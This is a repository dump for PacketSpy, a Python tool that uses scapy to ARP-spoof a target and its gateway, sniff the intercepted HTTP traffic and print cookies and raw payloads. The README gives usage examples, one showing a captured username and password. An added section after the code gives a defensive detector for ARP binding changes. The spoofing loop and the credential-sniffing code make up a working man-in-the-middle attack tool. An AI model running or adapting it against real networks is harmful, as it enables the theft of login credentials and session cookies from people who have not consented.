├── LICENSE
├── Readme.md
├── img
│   └── packetspy.png
├── packetspy.py
└── requirements.txt
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2023 Halil Ibrahim Deniz
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in
13 | all copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
21 | THE SOFTWARE.
--------------------------------------------------------------------------------
/Readme.md:
--------------------------------------------------------------------------------
1 | # PacketSpy
2 |
3 |
4 |
5 | ## Description
6 | PacketSpy is a powerful network packet sniffing tool designed to capture and analyze network traffic. It provides a comprehensive set of features for inspecting HTTP requests and responses, viewing raw payload data, and gathering information about network devices. With PacketSpy, you can gain valuable insights into your network's communication patterns and troubleshoot network issues effectively.
7 |
8 |
9 |
10 |
11 |
12 |
13 | ## Features
14 | - **Packet Capture**: Capture and analyze network packets in real-time.
15 | - **HTTP Inspection**: Inspect HTTP requests and responses for detailed analysis.
16 | - **Raw Payload Viewing**: View raw payload data for deeper investigation.
17 | - **Device Information**: Gather information about network devices, including IP addresses and MAC addresses.
18 |
19 | ## Installation
20 | ```
21 | git clone https://github.com/HalilDeniz/PacketSpy.git
22 | ```
23 |
24 | ## Requirements
25 | Install PacketSpy's dependencies with:
26 | ```
27 | pip install -r requirements.txt
28 | ```
29 |
30 | ## Getting Started
31 | To get started with PacketSpy, use the following command-line options:
32 |
33 | ```
34 | root@denizhalil:/PacketSpy# python3 packetspy.py --help
35 | usage: packetspy.py [-h] [-t TARGET_IP] [-g GATEWAY_IP] [-i INTERFACE] [-tf TARGET_FIND] [--ip-forward] [-m METHOD]
36 |
37 | options:
38 |   -h, --help            show this help message and exit
39 |   -t TARGET_IP, --target TARGET_IP
40 |                         Target IP address
41 |   -g GATEWAY_IP, --gateway GATEWAY_IP
42 |                         Gateway IP address
43 |   -i INTERFACE, --interface INTERFACE
44 |                         Interface name
45 |   -tf TARGET_FIND, --targetfind TARGET_FIND
46 |                         Target IP range to find
47 |   --ip-forward, -if     Enable packet forwarding
48 |   -m METHOD, --method METHOD
49 |                         Limit sniffing to a specific HTTP method
50 | ```
51 |
52 | ## Examples
53 | 1. Device Detection
54 | ```
55 | root@denizhalil:/PacketSpy# python3 packetspy.py -tf 10.0.2.0/24 -i eth0
56 |
57 | Device discovery
58 | **************************************
59 | Ip Address Mac Address
60 | **************************************
61 | 10.0.2.1 52:54:00:12:35:00
62 | 10.0.2.2 52:54:00:12:35:00
63 | 10.0.2.3 08:00:27:78:66:95
64 | 10.0.2.11 08:00:27:65:96:cd
65 | 10.0.2.12 08:00:27:2f:64:fe
66 |
67 | ```
68 | 2. Man-in-the-Middle Sniffing
69 | ```
70 | root@denizhalil:/PacketSpy# python3 packetspy.py -t 10.0.2.11 -g 10.0.2.1 -i eth0
71 | ******************* started sniff *******************
72 |
73 | HTTP Request:
74 | Method: b'POST'
75 | Host: b'testphp.vulnweb.com'
76 | Path: b'/userinfo.php'
77 | Source IP: 10.0.2.20
78 | Source MAC: 08:00:27:04:e8:82
79 | Protocol: HTTP
80 | User-Agent: b'Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0'
81 |
82 | Raw Payload:
83 | b'uname=admin&pass=mysecretpassword'
84 |
85 | HTTP Response:
86 | Status Code: b'302'
87 | Content Type: b'text/html; charset=UTF-8'
88 | --------------------------------------------------
89 | ```
90 | ## Footnote
91 | HTTPS support is still a work in progress.
92 |
93 | ## Contributing
94 | Contributions are welcome! To contribute to PacketSpy, follow these steps:
95 | 1. Fork the repository.
96 | 2. Create a new branch for your feature or bug fix.
97 | 3. Make your changes and commit them.
98 | 4. Push your changes to your forked repository.
99 | 5. Open a pull request in the main repository.
100 |
101 | ## Contact
102 | If you have any questions, comments, or suggestions about PacketSpy, please feel free to contact me:
103 | - LinkedIn: [LinkedIn](https://www.linkedin.com/in/halil-ibrahim-deniz/)
104 | - TryHackMe: [TryHackMe](https://tryhackme.com/p/halilovic)
105 | - Instagram: [Instagram](https://www.instagram.com/deniz.halil333/)
106 | - YouTube: [YouTube](https://www.youtube.com/c/HalilDeniz)
107 | - Email: halildeniz313@gmail.com
108 |
109 | ## License
110 | PacketSpy is released under the MIT License. See [LICENSE](https://github.com/HalilDeniz/PacketSpy/blob/main/LICENSE) for more information.
111 |
--------------------------------------------------------------------------------
/img/packetspy.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/HalilDeniz/PacketSpy/9e5218a4a11ee04e9ed850456bcff602fd2eaee8/img/packetspy.png
--------------------------------------------------------------------------------
/packetspy.py:
--------------------------------------------------------------------------------
import argparse
import os
import sys

import scapy.all as scapy
import scapy.layers.http as http
from rich import print
from rich.console import Console
from rich.markup import escape
from rich.table import Table
from scapy.all import ARP, Ether, srp

console = Console()


def _esc(value):
    # Packet fields are untrusted input. Escape them so bytes that look like
    # rich markup (for example "[/x]") are printed literally instead of
    # raising MarkupError or restyling the terminal output.
    return escape(str(value))


def get_mac(ip):
    # Broadcast an ARP request and return the MAC address of the first responder.
    arp_request = scapy.ARP(pdst=ip)
    broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
    arp_request_broadcast = broadcast / arp_request
    answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]

    if answered_list:
        return answered_list[0][1].hwsrc
    else:
        return None


def arp_spoof(target_ip, spoof_ip):
    target_mac = get_mac(target_ip)
    if target_mac is None:
        print(f"[bold red]Error:[/] Could not find MAC address for target IP: {target_ip}")
        sys.exit(1)

    # ARP reply (op=2) sent to target_ip that claims spoof_ip for this host's MAC.
    packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
    scapy.send(packet, verbose=False)


def forward_packet(packet, target_ip, gateway_ip):
    # Redirect between the target IP and the gateway IP.
    # This function is not called anywhere in this file.
    if packet[scapy.IP].src == target_ip:
        packet[scapy.IP].dst = gateway_ip
    elif packet[scapy.IP].dst == gateway_ip:
        packet[scapy.IP].dst = target_ip
    scapy.send(packet, verbose=False)


def sniff_packets(interface, target_ip, gateway_ip, method=None):
    try:
        scapy.sniff(iface=interface, store=False,
                    prn=lambda packet: process_packet(packet, target_ip, gateway_ip, method))
    except OSError as e:
        print(f"[bold red]Error:[/] {e}")
        sys.exit(1)


def process_packet(packet, target_ip, gateway_ip, method=None):
    if packet.haslayer(http.HTTPRequest):
        request = packet[http.HTTPRequest]

        # Get the source IP address and MAC address.
        # HTTP carried over IPv6 has no scapy.IP layer, so guard the lookup.
        ip = packet[scapy.IP].src if packet.haslayer(scapy.IP) else "n/a"
        mac = packet[scapy.Ether].src

        if method and request.Method.decode() != method:
            return

        print("\n[bold blue]HTTP Request:")
        print(f"   Method: [green]{_esc(request.Method)}[/green]")
        print(f"   Host: [green]{_esc(request.Host)}[/green]")
        print(f"   Path: [green]{_esc(request.Path)}[/green]")
        print(f"   Source IP: [green]{_esc(ip)}[/green]")
        print(f"   Source MAC: [green]{_esc(mac)}[/green]")
        if request.Path.startswith(b"https"):
            print("   Protocol: [green]HTTPS[/green]")
        else:
            print("   Protocol: [green]HTTP[/green]")

        if request.Cookie:
            print(f"   Cookie: [green]{_esc(request.Cookie)}[/green]")

        if request.User_Agent:
            print(f"   User-Agent: [green]{_esc(request.User_Agent)}[/green]")
        if packet.haslayer(scapy.Raw):
            print("\n[bold red]Raw Payload:")
            payload = packet[scapy.Raw].load
            print(f"[red]{_esc(payload)}[/red]")

    if packet.haslayer(http.HTTPResponse):
        response = packet[http.HTTPResponse]

        print("\n[bold blue]HTTP Response:")
        print(f"   Status Code: [green]{_esc(response.Status_Code)}[/green]")
        print(f"   Content Type: [green]{_esc(response.Content_Type)}[/green]")
        print("\n" + "-" * 90)


def scan(target, iface):
    # ARP-scan the given range and return the hosts that answered.
    arp = ARP(pdst=target)
    ether = Ether(dst="ff:ff:ff:ff:ff:ff")
    packet = ether / arp
    try:
        result = srp(packet, timeout=3, verbose=0, iface=iface)[0]
    except PermissionError:
        print("[bold red]Error:[/] You do not have sufficient privileges. Try running the program with 'sudo'.")
        sys.exit(1)
    except OSError as e:
        if "No such device" in str(e):
            print(f"[bold red]Error:[/] Interface '{iface}' does not exist. \nPlease provide a valid interface name.")
            sys.exit(1)
        else:
            raise

    devices = []
    for sent, received in result:
        devices.append({'ip': received.psrc, 'mac': received.hwsrc})

    return devices


def main():
    parser = argparse.ArgumentParser()
    parser.add_argument("-t", "--target", dest="target_ip", help="Target IP address")
    parser.add_argument("-g", "--gateway", dest="gateway_ip", help="Gateway IP address")
    parser.add_argument("-i", "--interface", dest="interface", help="Interface name")
    parser.add_argument("-tf", "--targetfind", dest="target_find", help="Target IP range to find")
    parser.add_argument("--ip-forward", "-if", action="store_true", help="Enable packet forwarding")
    parser.add_argument("-m", "--method", dest="method", help="Limit sniffing to a specific HTTP method")
    options = parser.parse_args()

    if options.target_find:
        ip_list = scan(options.target_find, options.interface)
        print("\n[bold green]Device discovery")
        print("\n[red]**************************************[/red]")
        print("[blue]   Ip Address\t    Mac Address[/blue]")
        print("[red]**************************************[/red]")
        for ip in ip_list:
            print(f"    [green]{ip['ip']}[/green]\t    {ip['mac']}")
        print()
        sys.exit(0)

    if not options.target_ip:
        parser.error("[-] Please specify a target IP address using -t or --target.")
    if not options.gateway_ip:
        parser.error("[-] Please specify a gateway IP address using -g or --gateway.")
    if not options.interface:
        parser.error("[-] Please specify the interface name using -i or --interface.")

    # Enable packet forwarding.
    if options.ip_forward:
        os.system("echo '1' > /proc/sys/net/ipv4/ip_forward")

    return options


if __name__ == "__main__":
    options = main()
    target_ip = options.target_ip
    gateway_ip = options.gateway_ip
    interface = options.interface
    method = options.method

    try:
        while True:
            arp_spoof(target_ip, gateway_ip)
            arp_spoof(gateway_ip, target_ip)
            print("******************* started sniff *******************")
            sniff_packets(interface, target_ip, gateway_ip, method)
    except KeyboardInterrupt:
        print("\n[bold green]Detected Ctrl+C. Resetting ARP tables...")
        # Reset the ARP tables.
        # Note: these calls re-send the same ARP replies as the loop above;
        # they do not announce the hosts' real MAC addresses.
        arp_spoof(gateway_ip, target_ip)
        arp_spoof(target_ip, gateway_ip)
        print("See you later honey")
        sys.exit(0)
--------------------------------------------------------------------------------
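The ARP replies that `arp_spoof` sends bind another host's IP address to the sender's MAC, which a network monitor can spot as a changed IP-to-MAC binding. The following is an added example, not part of the PacketSpy repository: it parses raw Ethernet/ARP frames and flags such changes. The sample frames are constructed from the addresses in the README's device-discovery output, and `08:00:27:aa:bb:cc` is a made-up MAC.

```python
import struct

def _mac(s): return bytes.fromhex(s.replace(":", ""))
def _ip(s): return bytes(int(p) for p in s.split("."))

def build_arp(op, sender_mac, sender_ip, target_mac, target_ip):
    """Build a 42-byte Ethernet/ARP frame (used only to construct sample input)."""
    eth = _mac(target_mac) + _mac(sender_mac) + struct.pack("!H", 0x0806)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)
    return eth + arp + _mac(sender_mac) + _ip(sender_ip) + _mac(target_mac) + _ip(target_ip)

def parse_arp(frame):
    """Return (op, sender_mac, sender_ip) for an IPv4-over-Ethernet ARP frame, else None."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != 0x0806:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    sender_mac = ":".join(f"{b:02x}" for b in frame[22:28])
    sender_ip = ".".join(str(b) for b in frame[28:32])
    return op, sender_mac, sender_ip

def find_binding_changes(frames):
    """Flag ARP frames whose sender IP was first seen bound to a different MAC."""
    first_seen, alerts = {}, []
    for index, frame in enumerate(frames):
        parsed = parse_arp(frame)
        if parsed is None:
            continue  # not ARP, or not IPv4 over Ethernet
        _, mac, ip = parsed
        trusted = first_seen.setdefault(ip, mac)
        if trusted != mac:
            alerts.append((index, ip, trusted, mac))
    return alerts

# Constructed sample capture: two genuine replies, then two replies from another MAC.
GATEWAY = ("52:54:00:12:35:00", "10.0.2.1")
HOST = ("08:00:27:65:96:cd", "10.0.2.11")
OTHER_MAC = "08:00:27:aa:bb:cc"  # made-up address for the sample
SAMPLE_FRAMES = [
    build_arp(2, *GATEWAY, *HOST),
    build_arp(2, *HOST, *GATEWAY),
    build_arp(2, OTHER_MAC, GATEWAY[1], *HOST),   # gateway IP claimed by OTHER_MAC
    build_arp(2, OTHER_MAC, HOST[1], *GATEWAY),   # host IP claimed by OTHER_MAC
]

if __name__ == "__main__":
    for alert in find_binding_changes(SAMPLE_FRAMES):
        print(alert)
```

First-seen trust only helps when the monitor observed the genuine binding before the change, and legitimate events such as DHCP reassignment or a replaced network card raise the same alert.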
/requirements.txt:
--------------------------------------------------------------------------------
1 | scapy
2 | rich
3 | argparse
4 | ipaddress
5 |
--------------------------------------------------------------------------------